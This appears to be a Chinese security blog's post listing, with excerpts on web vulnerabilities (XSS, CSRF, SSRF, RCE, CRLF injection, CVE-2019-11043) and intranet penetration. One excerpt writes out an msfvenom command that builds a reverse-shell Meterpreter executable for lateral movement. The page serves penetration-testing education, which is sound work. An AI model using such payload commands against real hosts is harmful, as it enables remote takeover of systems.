自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(12)
  • 收藏
  • 关注

原创 CRLF注入(HTTP响应拆分-截断)

2023年HW厂商斗象面试题——CRLF注入

2023-03-27 20:33:24 4220 1

原创 子域名爆破的泛解析问题

信息收集如何处理子域名爆破的泛解析问题?

2022-11-23 17:19:11 2023

原创 一次burp无法抓微信PC端小程序的深刻经历以及解决方案

今天想用burp对PC的微信小程序进行渗透测试,发现怎么抓也抓不到,明明之前可以抓的,经过几小时的研究和资料搜集,终于解决。顺手把如何对手机/模拟器进行抓包也写了下,在我会提到是如何解决这个头疼且深刻的问题,这个问题我相信部分师傅应该都会有,希望能帮助到大家。

2022-08-23 01:01:57 7321 8

原创 Ueditor编辑器任意文件上传漏洞

一文学习Ueditor编辑器任意文件上传漏洞(部署环境到漏洞复现)

2022-07-30 20:46:04 18722

原创 DNSlog平台的搭建

从0到1搭建DNSlog平台,最后拓展了实现自动化运行DNSlog平台

2022-07-12 04:15:44 6005

原创 使用Metasploit进行内网渗透

一、网络拓扑图假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限?二、Win2008主机上线msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exemsfconsoleuse exploit/multi/handlerset payload windows/meterpr

2022-05-07 22:08:02 1694

原创 RCE代码及命令执行漏洞

  在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。一、代码执行1、脚本(1)PHP  PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。  常见代码执行函数,如eval()、assert()、preg_replace()、create_function

2022-02-13 17:59:17 7053

原创 CVE-2019-11043(PHP远程代码执行漏洞)

一、漏洞描述  CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。  向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。  该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下:location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_

2022-02-12 23:35:58 9027 2

原创 SSRF服务器端请求伪造攻击详解

一、SSRF概述  SSRF(Server-Side Request Forgery:服务器端请求伪造),是一种由攻击者构造请求,由服务端发起请求的安全漏洞。  其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据  数据流:攻击者----->服务器----->目标地址  根据后台使用函数的不同,对应的影响和利用方法又有不一样  PHP中下面函数的使用不

2022-02-07 23:16:20 6344

原创 CSRF跨站请求伪造攻击(附自动化工具实战某CMS)

一、CSRF介绍  CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像xss漏洞,但是它与xss漏洞非常不同。xss利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。与xss攻击相比,csrf攻击往往不大流行,也难以防范,所以认为比xss漏洞更具危险性二、CSRF漏洞原理  CS

2022-02-02 23:46:18 2982

原创 XSS的Waf绕过及工具使用(附靶场通关记录,持续更新)

熟悉常见的waf绕过方法和工具使用,附靶场通关记录

2022-02-01 19:32:02 5251

原创 跨站脚本攻击XSS(最全最细致的靶场实战)

一、XSS跨站漏洞(1)XSS简介  网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.

2022-01-31 13:51:06 36897 15

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除